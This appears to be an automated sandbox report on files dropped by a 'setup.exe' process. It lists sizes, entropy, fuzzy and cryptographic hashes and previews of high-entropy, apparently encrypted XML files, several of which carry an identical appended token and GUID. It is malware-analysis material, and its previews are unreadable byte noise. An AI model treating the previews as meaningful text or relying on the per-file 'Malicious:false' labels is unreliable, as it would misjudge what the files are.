              Preview:<?xml<.AJ......U..`K.Q.S^.Z...;.x....A%.2c...78.Y;.W..xS..e......~.<V#..g.......h>v.....~..v9Z)....Qs..:.D`.p...c?J.`|( ..h..iE...Z..cW.h.G....7@.+...UPV.eD\.C..y3".....F!.t..%0....XA...|G...=.R.&.OY.....9........?s......I..jt......8i,........{.6..z.j...yN...t.=.....C-..z.*,MH.]<.M.Y.B..].bC.j..p..;. &.h%_.Z..7.....fc'S._34LK..V.{..N.l[O...A....]...n......A...9&.M..qU=.HV^.%.).9......-+A....1.^.c$...P.C"....O|@..F....o1.........|......v.Mj...3...l.....$..G.m.......F|.4.N...1.Jt..pt../.kr.4.-..^9.....T"S.UF.93e.SM.*...H....9E.Og.+l.]`GW\.~...$..u..........]...P.?}..>.l.,.*..-..SaLvy...*.5..%~...1.....D......8.P..ct.....M}.......*$......Giu...X..0....~gw)."..t.OL*nx..b.u.I9..L!..x.... K9..4..e.....V|...K..........g:.3...._2!..._..8..$.....<..j.M....T<...L..EG3.Q.g.....cm.. ..eN5R....a.D.HXi.:.N....=..m.Iu..-.B...K'.|..t..w.k.I.&...f,.x.-.qVz.5o.}mk..i..T6+.k.}..lrD=.....a4.g!.bJ....A.M.>~..lH...fC.I..n..)b&..e.l.}J.?..-....,mk..w-6....T..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1145
              Entropy (8bit):7.818305581052706
              Encrypted:false
              SSDEEP:24:/lJ964imva//JgtPLAbvfM8MmKVy3ZzRv3OGD1L9oIN7bD:z9Mmo0MbHtdKVyF1iIlD
              MD5:D154D06896ECE2C845FDE4A5628C0636
              SHA1:508466AAE677A043680B33B3E037BBAE7AE9232F
              SHA-256:9DE30F584D1ED35B3602E37730F9975F8C741E3BC37311BCF35C64938FDA3E56
              SHA-512:085538B6AEEECEF06CB111FAE543B52A3E22D2551E0F1D822B2901CDA9DD3F80BF74562945F85EB2B6F13D4FFB9BCC20F650AD4E8CB8DCF34ECF2B9434F25018
              Malicious:false
              Preview:<?xml..no.....#K..........Z...n.>........~N".s...V...&.QE.....gG*....-w....A8.4....\'i7A.J....q.g.v.o...1.f....P......W.d..Z.A.w..wRB&...dPt.b....-.m..&.....h.sF7...iL4...i'.....N.B.........;.~:Z.K..."<9..og.I3 .zr.$..bN.A..=.......A...O.jX.H.y,...i.m.......k..axmd.f.w.BJz....D|...}gX.)m*D...#.2V.......0....,..3.H.a.c..tT.b..S+...M..".T.O.Pr...../.T--...~...7..h..!..;q(..=...?.Gs+....A..Om..q......J}D.Hx.D...z;..8.....p....D.4......@.6.{f..-..<h..`..f..3q...s.f.5..p...j.D~n.....DK..).x.&.^.....aZhy .c.....FM......B)J...W.M..r....{..+_i*.1...<..".....D.[.."^.w.<.4%.iI..d...eu..9.......Jh_t^..tz.vH.q.....t.a.....T..3.82.qI..2.....^.0a:Z'H.K.m]kH.pZQI.o.1d...X.|\..6H....Nvu...|...{.}.m..n]nR3..u..I.I......9..k.........:HD.t"........Y9.5.&..|.E.vm...sK.-.dN..)..I.U....x......b._.}.......C.r....O.........4.4...{...[.].O.........x.3]....<...|..N>.(.`2.j..7...x.v9c.1......{+.....K.....sR..S....j;.C......{y6O...?9..7b..xI...|._... .Upi*X.Ks...9."{<Ch.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1145
              Entropy (8bit):7.823426158967257
              Encrypted:false
              SSDEEP:24:MLdKw+HpRo2s0IP/lOA8mn7dgchtMh0CQprdzxcbWbD:c4JMhDP/lOJmn7drhhC45lD
              MD5:C04603ACF653F11EC713FD17A2915DB5
              SHA1:C18BD2F659E076F14002B9F3731504304648BB94
              SHA-256:5019C93FE6A461BFD5360FB01C9607D14D226D3794C831656DFCA1592DA5FE55
              SHA-512:A38A0F28EA90574D9CC12D433440360DCCC39EF181B950E371DD1A48F429D39A20455E57C658EFC29FE12874E226C96133DCFCF6385A5CF716C25C37398EE40C
              Malicious:false
              Preview:<?xml&._.......x......V.)...e.e.....jq..i d./D..Ij.#^x.u....3...`.(.O.5.R...R.`.2.....!.....".h.].k#.b.2..cHZ......s.)+.G..`=%.f.?!4>....o..j...;..Z.....q..[.$vo.h.....A..3.aw9.?..sm..l.Q0.......IP.~.R=g(i...m..D.:..&..6?..P..%.............'...2..w.Cx:d..N...+>......aF...5...hi..\....aZB..C.gu0x...0..a...._.i....9.h..f.j.j\..K}..3.........e.!..R...V.....]..lE4...[v....p3.z..q.3.)}.d._.....L....... ...{W....Ki...j..Y%ub"$.5..Z.!Q.n)..S.....u...#.K...4N...LN.h.....L..}..6k...e.E....p. ...l!.-I7w...$.......~B.}......[y.}..V.]#5...4.S/.4A.im.....#.z...u]..4.j...2....zm..&.&../.&TT.....A;...g...C.F..E...k..%.Z..4.y..........T.[..U.Ei.;sY...^H....i.{?B..>G..Y``>..f.39..tj....B.....a..X=..._.L.,.....A.n.CE.=W.*.c#...7.aY...e...]<:.m.s.........7....LKM3E.^....~Z.?......H.v... o..|jGS....h1.Nu..c.~..5.:....i.s....S.%d..[8....S...].b...kB...B..[}..].b...N.9..9..z.1.L"P..u.S.,[.:f.4..{.%....=...Ko.qa...+.....hw~.~...x..U.Za@.B.P..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1145
              Entropy (8bit):7.8024251413923915
              Encrypted:false
              SSDEEP:24:ASg0WzRv4qxm3vfV/2/yiD3jL1Wfe6wlJXrbD:Ab0W9wtFy93P1WfnwlJXPD
              MD5:20D58D61ED93660EC18DE2D46CD0864A
              SHA1:D50F69C11E39367D1B3988C84BEC15A87B00AA42
              SHA-256:8C07A7E71E6A5E2BA91A33393FE925F0B4DABFB003F0AE5E83E02749F8413750
              SHA-512:96E53EADB4F452C00EA7C08DD1F7FAE38D3527F35DB707F223A0DAE8E4850DFD3296C82472E4FD98448C39C899F39D6E6A16BE2FF618B6811FCA9217C4097CD7
              Malicious:false
              Preview:<?xml=c.m..G.-.,.....,......c.~C..)..;._i....?...f..W^.Uf3.i,.._.O.p>..........7[X.moJs.:r..-.p.I..x..w.$.Z....4.......R.,.Cs.q..U.^^#E_.F.+T......R..R$....9./...<..`.X..Q.../..n..g.....3.....3..1.-.o. >\..Q....d..#T..-..;h|........c..I...-p.'......4U.=3kk@qB..q.)..\d.`......W./...k..../.]|R.^+..X....{..2'%......R...C..H-.[_R9....x...]..l.>.rTl....M....T.........7..[at..N..o..On.;....PK..t...>....q~YL..^..3C.q..C.j=h....*v.../...~...U.'>.d.;...J...7...t..d..X5....,..4...5......c^..?. $.L.52w]wUCGY...L...A...oP...u-.k\...zz...[....rFn..I.6F1........./..i.}.Fo,8..:...H...N'.`.4.q..i 4.............p.?.....XD....]..s...2.)c..!)].*]8...+..ap.......E.....Z.g...........Of\....x$..kg.....h...<...i?a.....]%...........pW.......L..k.....Ga....F...k.]3..@......=%.H..T..<7T.*...o.MYF..8..!T...I..D..xg.T..(;./9.-..a!o.....i.p).v9....{.~7.sY.t...6...5,.X.SS..p......"B..+T..&f|..|s....$.[J...w...k...6.c.~.........a..8.1....6Lc.... TO;..SO.N.b.>.e..?..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1144
              Entropy (8bit):7.841358467086242
              Encrypted:false
              SSDEEP:24:AwXNXcGMhBJ5qIFHFDhi9CwZSCr3lZP9rN+qaQD6aKFRrbD:AwXNXehPDhRcHr3lZP9va06XVD
              MD5:9DBD162ABF4735A1E4330068DE4840C7
              SHA1:489F31E830BB65B595CA2D9ECD7E8884A4962B4E
              SHA-256:408F52B1CF12C5880A8DA8427BC061489737E3E986405958416C9CA20901B233
              SHA-512:B5630B366A4B6EBA9A03087A2F0E6AD13557FDE9F54DA024F518F6E76C13069A99B9E2D0D73809F61A6FE5B0E064727A6735B10599375D0C52E22838E80082C3
              Malicious:false
              Preview:<?xml*..H?i..:k.wZ....,.6.h.#!..{..$i..jm.& ._..u..O...]`w.& ..a....7y:2+x.......%..%."g.FdM.f...t.....V......y .p....$>.8...d#.....N.^6..u...r/|k.J...Q...4.....a.&.9...D.N.s...az{XT.X....B`.n.%....I............9G[.n.K.[..@....7Q....{.'..u%.t...%D.,j.K..5[.....ls(.&...;.a..ITF!....d............h^7.p{'...........6.gv|./....p...].LA...#3.A.h].Z....0..7.*../..mb+. .Mm...Lr.8....k...2`/......~.v2J...n4@..;)(5#.}u.M.|.E..ifi.1{.a.FC.?.`|$,r"]9.B.I...w.S.0T.Tc....\-.... .39..)z..W.S..r....>...QY]pAnf.o..g......G.5.../%..A;....Ml.H....!..--...\.&'...r.tr..>I..~...}...e.....K.q.m.....[...h.....^t......q..@4<.B.c].sa..;L...6.c...gv."....=Y3.hq.+.....&.....M....9k..5..o.{.)pt.n..C.K.;GK9&$-_....\.UiK....|=.....Je.cL.a!0l...b#w....."~...p.\.X...yT.A..lo..b)....<Xo.~`!.Yu....\.qO..D....r...s=.*E.f....B..u^.D...2..D.M..GJ.....M.....Y.....$\"..&.n.._....#s........k......N.y...N..)d+.>L1..Y.....f.:.m7z.^.{l5.K...~1.sd.1..O..4.o....M+..t/x.......t..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):848
              Entropy (8bit):7.746006940628987
              Encrypted:false
              SSDEEP:24:G1awN3XkkRCxqPe0CICD1v42+YGHG/TyDxMi1y4HHDbD:Cmxq8IeyfYGm/MLy4nXD
              MD5:CC0D1F978DDF8AB371A7FA32CA07D5DA
              SHA1:946056D044F4DF7F749B0B36E42CD1E15BE63693
              SHA-256:F38E6C4757CC6F924EB401FA6157CC5EF056612110650C05B2B80692C9B82518
              SHA-512:18EC890443D251B1D284CEA389B60AA7B6CF089479AC86E9AD2BD3EADDB8FABAFFF8AC9C84C9FC17BFE443AA192E956853C7165AD2A8CF489A664A22C753A078
              Malicious:false
              Preview:<?xml....T...<..`.1..7.9I..6.J...F.M\K......HI. P.y...E...91X.r..?....y...w...W.j.@4..O....y..g8[.u..]Hx=-...,%.6......6.$.........T\.x..k..V.J...l0.........F`.Z..@....r.y.Y....v.c...?/A.B.).J...'.. ...fy..V<.^0..h..Q]`*tQ0>..B-....J.uJ...s...n..iJ.`.K..eA..[1q.q..{h.`.'#q..WQp..(RsE&i....|.......bx.~.....4.#.v.{..#Nz_.o....]!..lX...D...L....@.-.EH[Z....l+..K......s^..*.W...N...H`t8?.$.Ko..f.V.%.8 ~..J.W.m....U.........c......g.f.>.N.u]..`}.V.K...>5.>.1.^.>a....S....e9Te...I...5........Jl.._O.....<.(+E$rqC.(..qjV.Wa.c.5.;..Xj|...H.hZ.o..=ZE.I.b..q....|.6...'.@...H....:Fu._.t.#,F....w.9Jk..O'....<.#_../...E.9.0.d...P%.........&....)f..5;IZ.D.....a.C.......|.)b..W......E.w.b...Y?\..............~...y.....o...[Q1.2..r... Y.n...e...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):767
              Entropy (8bit):7.699242765341461
              Encrypted:false
              SSDEEP:12:CADLruDzlISo69HxqZ95GiYYhvfaYTHr4I+HJov9LdZs8HlMMz7xvwzRn3gKmC3T:CSSDzlT3Fxw95GiYYhXn07HJojZ7WMf4
              MD5:3E4783A7E8D7B010C5C800A2C3DD9FC1
              SHA1:44F7B34C55FAB9FF3498873412587D638AC13469
              SHA-256:91D5EB01E5BED053E6B542EC44A8119CF6786365691A6AE6B045050FADB2F53E
              SHA-512:6D57FDEFFF52B21540608F50830512195B3B81818B9ACA6CF61B6AF524036F86003CB25EE511756D002188C9DA0137E0F238577468F52900629B7732D6140D23
              Malicious:false
              Preview:<?xml......Mn..Y..=.?-....n]....w"2.ZD..;..G......u...L.....u....f./G,.;.....u:.T..Nq*..<...r....b(]}.4.&..h."n....SG\.jv...>Kg%...)G...b.^...V...GM#..i.@.0..Nt.#..CI..`..a.u..8C;...o..r....... .3...y.x>k6.B..r<....p .|....[....l....D....whE@.i7...i.D.E.hXE"_*t.W..eVq$.^....{.....k.V.k.z..Q.c>^'.;...9m...p..m.3.8....-.|..F4...p>...G0.=..N?/he...s.Bg*.....0.If....O2-O.AF!(...,KF]...`.....K........@..w.34Q...xu.......F...|XKCT.u....q..^.K.."x1]q...*.g#+..x..U+..N6.....h&...g.._.4.O]......).d.FK.wc..$.[.'....P..M,............ ..A....T..=.>ucwFU.(...5S...dzUv.Qf.K..j{...T...GjX....$..e.,{...VE.....^. .c..9{.X.>.AYR..48_.......b.......S.:p...VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):845
              Entropy (8bit):7.6975606975380115
              Encrypted:false
              SSDEEP:12:+rE+Y4/K+4oSDYKFi8GitXkKfoCjCS2ritpOa1ryzxkGS0bkLxiotow+C9CCfPMH:+rY4/mohuTswLlyO/xxto81PoPkubD
              MD5:125212FCDC632E4F00DDD437C9CC5AEE
              SHA1:4E7ADAA2AE7C9E48389CFE4AB7825ED80FD7BED0
              SHA-256:7C0BAC76F5C38FCD7C032B721E5959A9C6EBAE799F02F71B488F02B9995A4C53
              SHA-512:11CC8A66C55025CB2B518EAA810B1392A268E9C9004CA25DA4F6381D840E6E44F4FCE66D28B481928627631C03955406910339BD5542F68446B2643B80690526
              Malicious:false
              Preview:<?xml...4=.Q.*..6.f.\..J.N.rPD...a..g...Z."4..(/...i.o.Z`..-..Lw....a*..P.,..)....... ?.0.K.].DC...E,X|...44..Qx.~g..56P.g.......'..zk..8s....!...[...>.h...-O......L...0N]>...b.m|c k.4nS.....o.....R..9.la.M.#]()/;z3L`..L..|5k.P .Yg..".M...Sk.;5w&..L.2;H.q.Ttt....1.}..4.Q.:.Q...E....u&...gbk....YO....W..@........$..W,#...K..S..7..s.Q.Q ....~.%.#..g../.QE......j.Y..lXxCUZ..%...<.....H....\w.v.R.........g bw..49.hn~.7....N.9.y."3.D.P..8r..p..1....i.L'NL...A.20...<.;N....EC.=.o.....F....X..:9....#...H.#.4#.GZP.H...r.p>.........X-.=..a..DK"^...'.n......i}Tt....W....&..<h*G.]....@....N.A...a^=8...".P..T. ...I.R.N3}..3.`*aL.b.(...6.e@w....l......W...aM....D...h2.@!.yy+.u.3.}...4.hhD.C.RD.#H....K....|....zV|......>.j.O..s45z.VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1233
              Entropy (8bit):7.825677846745676
              Encrypted:false
              SSDEEP:24:869CieboSPgjC1LpmDtOZKVMg7pplk+/uZpIQ/8nUqT5bD:JreboS4jClpmxOZKVMspA+XalsD
              MD5:29D377E34A8C2C1124D88DCA162E6616
              SHA1:9CDECAED5E6A5C332512E31740249B5434C272DE
              SHA-256:A592F241A7DE5795535FDE2339627AC58AF62C625B351F7DA10317CD03861E8A
              SHA-512:D5011420EAE0BA792FAECD3634973D1E481D647AC11E3276C327F2655F3FAABCD6A4D749870DB5E66D254C6F6C0AC3AE9E9276FB20E92538DB1FC9A5D9773DCB
              Malicious:false
              Preview:<?xml.B.........lG\..+-VM...;..G0............ |G.r.."!.....$......>.{......k..W.......h........%..{...g.V....Rk....yxf.9.SA.a.:.B=..1.......fy....a[..7....x&..X'...p.g.tg...w..L..,...._k.`..D.*.~9]D2....8"{.t(..u..3.....kN..c...y.^\s..->B....)x..CZ....!..*...y.n.U.8.H...@.L..b.l...........w.r..j. ...U5..}............`......Y.S.N\...|........gT..A.....8.o.....AE..K....)....H+..&7....9.R[..IS.yXa..>.$.4.h.]:0.X..L.&`.. ....`.j...}u...cXP.J.....Oh...C.X6..?../zC..W..%D....yGG?MWQeC.6.8..Q.~%...V......J0....Y....rL..B.+.,.;..j.8..|...]e.jC.+...t.nR...@..<4Z.....:.2...,._.Kd6.g..`E.......+.p...eL.hu.<."x..X....O.....(q....M.yR..$...RO.'.].....]....:..;vU.k.Q(,.G.~..Gt......Q.:...T.A.W.QDU...)Z.b3.J1E....D.J._..n.m..y..5..Fe:.Y..c..4...U....-.\.r.].3...C....KO......b3kc|.............@F..9..BH.....m8L....48....#....3..2.XM..{1}&;.|-.....K......2.>j)...Q....N..w....y.*....T.,...5l.r./'y4;..ce.....v.f.K..:G....!f..mZ......Z.r...[...!"B..-l.F..g2.cr.*
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):934
              Entropy (8bit):7.766356550801708
              Encrypted:false
              SSDEEP:24:LT6c3VzgF0hSMUvsQLZN4w3Ni/8+6LEk1bD:/3VkWQkQkx/8+6LtlD
              MD5:6ADBB47F52BE8B76D244B8DE652D1ADF
              SHA1:B3CFBEAEC665F4B8EA634BA294D5D9B01BA609C2
              SHA-256:266C909A358A6BC67C218BEB5284F5EFF63EB6638696954601E00D2D9DB6BCA4
              SHA-512:E1235EBD5019B07298E48FABD8283ECF5F5DD7942A8EB0E169D9085152A116228DFA2D73E5AD5A1DAA926CA6F0CE009DA3871AD911A6CB124D82787BBB3C4F63
              Malicious:false
              Preview:<?xml\.....RA..C....)..1r=.KZ.F....UJ.Yh1.zu.. ........C.N4O..G..j..&..G.p8%......V.V.-B..i:".u&.b..C..9.8..qM>W.....w)...^.....Ff.....Z....)$..n...i.f.....o4...._.[.=. _t...=^...O.C/.........~.....)'.6...Y..M..O.D...?Oe:...U=.^.:.3...R.9.G...2.dX..FLZ.....l`[6a.......|.8.....m.RU1..R..T...,...[~.w1s\.4....Y.W....]...}..Lm..W.$...&.W..3.Y....r$:E..p._.._...u.N.xe?m.` %R..fF.....T.J.=....[..5g...r..uMw..c.s.{..~...y).9.b.K.....xf.S.....wE..#b.M[9q>.>?`.8......^..c..wQP.C.....W.p....P..YF&...z..R..n....v..N.*.....9..gu2\.'.....zbg.Y.b..p*.5TL..\QxU.3h.........w......yr..%..?!..Q..2.I.t....^.q...Mu........t/........S..@....L...:F[.....(...oX.A....m....z..>~...bX..1.N...=....U3.....s<.....K...R.{r....3...9..G.xU...sd?..h.E..uF..B...Q....'g...Ez. ....I..,..'./.e.,P......{.........?.8J..:.g.s..8...S?'.9..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):969
              Entropy (8bit):7.784535509908693
              Encrypted:false
              SSDEEP:24:uFPdRE5MK4C+L+sWNmZpFhhyr1VGlhAUZ+L7jbD:uFXon+sNmZDHAslhAUk/D
              MD5:D18F777F5B866F84BA4658167F861D96
              SHA1:F77E27546A15F12B3387F6BDF72B93D39977F72C
              SHA-256:7E5DA40B505291F8711BFD2437047A4B995E3C45BFE7F3BD7535E0BC717F41BD
              SHA-512:A3D5AEE8B1B769DFA595662A6128CD98AF445444049711E9223E7CDCC18B664F788D7AF22B0E7FC8301CA39E4F0CFA2868A97E1D8C439394861D4181FFD200C1
              Malicious:false
              Preview:<?xml.B.#O....v.m._R.....r0{...G....C.e....}.9.^A..C...$.aQt.ld".z.u.7n.l.."w..8l.......<O...@#j....p......e.....c.5s..c...`W.[.....R......=T....@..'...r7.?..0.p.e.....<F...8.W.P.W..n5G...._..Tw.d....i...W`Q...F...u'%z(.."^.g.t.>.3......"m..B....5....QH.|.c......]..d=.:..'.W.......4.U:5..5..KR<>-....I.?....,.(..6Y.k..1...f.wT>eW~.......^.....%O^.39a9.K.~CmKVXUJ..">....d].Q`"....|dp.......?q.6|ic'.\a.m...N."..O.....G}..s.:R.?....nQ....F..G...Mr..E.A.k..3.dF.-_.P.n.|n...S.~.eh..#;.-j......q....p.<....E.. ........=.r..._M..z.x..hLo..<.y].GPZ...'KVR...;.\..u.F.<.V.L.&R..]Ar.BjH=v(#g..7.>.rs..m.n.+ +Z.W....v...w`/5.k.O.......'.(J..lz;g.;.d..#.m.f..@.=L.#wz...T.M........$ruj1X..T...>....]p."...L..y....6u.~.hw..eqc.6.Lf..>S...!.k].+..Ic....5..,X.0....H..3ui......n..s....1......-..n...............`..s.d!...%W..e|-t..S...]&&..(..~.8..VrBq0iLIRHjQLgVRLsN1WK8yFkTCRDCCvPkwnHt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1467
              Entropy (8bit):7.8753005270332475
              Encrypted:false
              SSDEEP:24:/SNq3YvJV+q9T9PDOzIPolc8xtPEHXv0nmJ8eDTaUn5oY4ptTwrG340OMfqrHu+f:KNKKV+q9JbONlffPEHimVPdoY4jTgPM2
              MD5:FD6D8D911EB8391FE6798F60284542FB
              SHA1:E8C00396791FAC62D58D92A90816153B20FA11EA
              SHA-256:1C7C8977B63D833FFF1D78D1C176E672295FA37F308D4B53631EC6E279FD4A0A
              SHA-512:9C38779070CD2460E59EBF5685F62D17B6572167D8AD77FF32AFE9B043CB5FB23C45CFAC5416B8636B5659EFD063E97966BC32D2CB8250F0D1EB66EC8310FF8B
              Malicious:false
              Preview:<?xml.B.^......5.>{{.fu...y.8...c.,@...2-,...5X1N..t.kz.L4...t.....s."..2."Y...%..._}....H..Kf4o..fw.RqO....a....J.NW.W.a.....D...:.*..[...r..p.9}..m~.G..2...d..d.!...z@ Bw.}.q'L&M...m@.8.c.....e8#...:mnb..._:(.%..7*....0.G.:.n.~..o.C...g.:fv....b(*]...k..1...u2s...`B...r....?....{gM......5......o.}x.Jtq...>.I.b....C.....S.[>.`.2...e...J.p..{...v+......&......c...7d.#v...2.>|..'...a....5..Zo...0N.p.p...Z....'.s.V.s5c.^.....e......4o...,...B...O...K"....{..%R{.g/....(z..-..U..d>.L@(.E.F..N.).4_......r.'x...wR....^%.w.......... .bXg...xA.bZ.@....oJ.h\..z...u.q.......#...~.....<f/.].~.?....L...~5.z..gO..}A.....k...w....'......C_.*.[.....@......M......y...ut.N.X..........p.......B#{......6<8Wu!..E....0...1..L..%...lz\.0O./.{P......Y_....t.......\4..N....^..K..<.W"...O.lp..H...IR...A4.[t..K......5.h...........s^|.v!...Yz.~.,....G.{;.21...N...QH.....1\b..PR.G...tl...l.5.-...[..."{.'.A-..9?.y"e]c.?..sj..*.pG;}.K.`c...T...<l...V)b........R.j.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1397
              Entropy (8bit):7.861936248992543
              Encrypted:false
              SSDEEP:24:gwbIXhrT4VHrbOx2Wwb4Egpo+KTh3cJKy71TKUjpdOEHeUNqrq7YUDFomBo4c9eK:g9Rr6HrbOSbrgp9Kd3In7BKS/BNKXaoL
              MD5:1926374534B64143D7238B2F23F4D4E4
              SHA1:D52BC13C4E900E963E14B25503AAC02BC38964EA
              SHA-256:AD98532456064CB58B73B94A06959D9ADFA885C8CAC9F8CE4063C03F003B3BA6
              SHA-512:E8E116B8C0A6979903AAED302F804C8417E11F4FA80CBA81A5F95F13025803E987628C2F55F77B3724959EE552C8BFC5EE57B4BAB27205B06C63913F13E418B6
              Malicious:false
              Preview:<?xml.x .X....>t..]...3.".U.".eB...?g.....hgD...o.l (\...p......-.t?f..p.....~...#...................5....i.?0....~..S..a.V.1...>.&."..+.2a.b_PCH...6.!.....ow.^..l..wnv.z7=...Z.I,.'.$_<T....j.vR..i.....-F+..h..=.%'.V.j....g.B>.pW...=M{...wC...M......U69:..%.9}..].<.Ue.oi#s.....K...{..%.[d...D......*.2|.6..+w.HAF.M..?\.x..c.Y......_......=*L..A.,.;..m....I.w/).....n....o+.4.V...LD3.?.).+..uw......V....QX.4dH..[.a.G<.=.['..OAs.... l!........e..f.8.qK..%.....*4..l.q'd$.aY..Z....=.........?._..=..8..z....b'_r?|}.....4.&....e .`..A...<..-.9XI.'...0;.!z..C............v}.u8.[......?-.....K.U.0..a.'...l.!..}..._..=.OS.W........|.8/.7#................Q~.i+.D...U...$...&.^Q...MD..~....|E.......t.1HQ..:m...5N..V.U7R3q......<..O....L.....3.F.h...}:....R....a.'...$E....&v....(>."._\V.)..>.....t...&.;Z.....S..)...S...<........G._....t.S....Hw.PaCP..d.)4.d.8...w1O.h.X.X..!.;?...............f<l."En|.6D.6........d..Y..Xqh5;O9:....!.R.9N'.....N.?..u....D..
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1269
              Entropy (8bit):7.840925124137587
              Encrypted:false
              SSDEEP:24:YgXvqwFNNhiRWJt6slGd37pRujQjVW/6Kwra8umMvSN/5rn9kGQ87jQbD:YavqwiAJfYrffJWit6muwTO4KD
              MD5:1ABD98EA74418973AB334003323B95C7
              SHA1:5A99429AB7CF4597C1B1D14F8C567623B4703210
              SHA-256:467764C158F1E5A94F09F6DAC3343F2D18F9E202C71647071B3C62626A4CD305
              SHA-512:1B90A1F6933F8BBAD802D6B18A17EC3BF54D86C780FEF0205357316C5C0D684F1B2755CD937FA469C17AE0C21A5B060A49027C8BC4EF74A450D56CC95716244E
              Malicious:false
              Preview:<?xml......X.tI.....clD.I.5?..J...*...6..t..r9........._J6....^...c....c...i..7..+..\.z-E{.....N.8A.0q...Mvc...[..*E.uqq...|.#.5.v<K....V.*v............6.X...#..]....E....Z..a.#.F.CP:..+-..BWy6...C.7......7cq......$bV...>.W.;;.n.P`....-.]I.i.DV+...6 .*..r..&.$...|q4Fw.W.gu.a..l..7..t...Ql.4l_}.$.6.M.5....0.U.....M. O..L...l.......h..,`..D.r/..%...)B...`B..j$.a;s\.=J-Y.b., 2.d.*P.t.:g....3Zs.7..;.`W}&+<..&.....'q.c..`.E...2.G.O.I/...D...O..`]N.up_/.zj..S..%K....b.:.|..\..... .......+.../'..np9..v2.4.P|.........]..'%.`..,..H..X..._.~ha.....q.JF.zn1... .").cg.I.!.p(UVx....E?.r. A.41.0.f.>....4dsi....;....W"....<g.q..#|...z3.?.L..V...BU..`g...>4....@19./C.h..c.....Qr...()U^w-..d..>8..r(.A<x.QX0.S.-e.@ ...^....#5.\L..T.....3p. mf.kS.~....S.....?*l.Q&.Xd.Pxi..Y*..|...`..t7/-..#..J.._......H.F.....]..h.uV".@.F..;..+.~.1.. .....%..Y..C....."{..2'.zq..s..U.%...s..@.....:M|....Z..I_..J......F.C........U?!mx..J.T.f..u....L._.$..)..k....O..s....2
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1088
              Entropy (8bit):7.842222980829377
              Encrypted:false
              SSDEEP:24:MX4dppegPtMnN9MuPluzf1wnAVnu6T1XDnieaphE5sPbD:MIdp9P+N9MuPluzSO1DieaphE5kD
              MD5:BBD2D2AC483182D635352FF118D70B0E
              SHA1:E1644D77D40F9404BC81636C32A524F392A1B1CC
              SHA-256:FBE601A22542417579787A784DC5CCD57CFF822E911B3F8BC9D774B89FDBE3CA
              SHA-512:C3C3CFDE33A1252D125076058E29441320C33264D9A829C4B3527035B4C12DDC6B1DFE866BC1351C43424389BC3BC10A0A3DC0270FF7F6C78F476C6C1A6CAB82
              Malicious:false
              Preview:<?xml.N.a\+..f...Y*.If...br=.....g....kbD.Se.#"..5..[..=k.....h.........,x..u..V.I.i....[.lm.Mqn``r.I...4&B..%....vc..~...).a...t.l...]l.R..].....c..,.O..D`.. ........<..D....$.y...e.!.'@MM.q.Y..N..@Q:.H..~7..r.`.-..0.B..X....d. '.?.Q..NJ..^.j..Z.W..%.pmnc4....d.m.aq.b...u.,R'......o.{.._.9]....s[@......!V..'.^..*Q.NnC...z...|....`u~.g.!..@t...p.lDXT..l...].....As=......\i...nj..a........\......Wr.+x}.......r7Lq.. ..T@.v..r;1.G.'..o.L.y..J....mpo.n.rU...,.p...Q....|'l.....[..]A..^."e..X.....Y..e....v..71....Fw6g.....E.....u0]..~...,{|.P....#G...2..s.b..i.G..o`.~Xd)...v....h04...g6..\db.3[.".f59{ [..R.....$*...M[..zd....E.."..v.._.o.]Ms.+"vz....+}?.sX&~tZ.l...o;.!..1.x...3.o.........j.[.K.......O.vA..W....N.......+.@('S.../(......Y>...;.[..r.2..)....B....<Ae....o......~EXhCU.b.e|...j.m...K......h.a.xO.k@..Q....Y.J}..).Y.@.v..j.De.%......@....!.c...f8...Y..1F.G..VyU...U.W.3p.i4#.!p....W..#,....m..@. .._f..f$RQc.*...MxYy.....}......ia*1].A(.
              Process:C:\Users\user\Desktop\setup.exe
              File Type:data
              Category:dropped
              Size (bytes):1100
              Entropy (8bit):7.836609661177143
              Encrypted:false
              SSDEEP:24:OPGLCvIx+LONbn7gn2XETN9jvNaw3F4NJhr8JSjP+4C7EIviepMJ2X+3KhYbD:QG+Qx+4n8nygN9jNOrhrpW1u3KhCD
              MD5:CE43FFC17084745A7C0B3D5DDB3F0BAA
              SHA1:3AE04532C7D62CC2CE0B6A73D2583FCFB041DFCF
              SHA-256:574B95F133C6BBB9A2FDBBE59CE232E58F0B9BE8BF8C2A97C1D36F21ABBF3E5F
              SHA-512:C20D98459178955327DF2ACF5A031592104FCD8AE852DFDFBBB174DD729519BF6F1DE3E7A8EF8C0398C2158EA77C7090F2BBB8707A4D8504DA095C9E214DBFCB
              Malicious:false
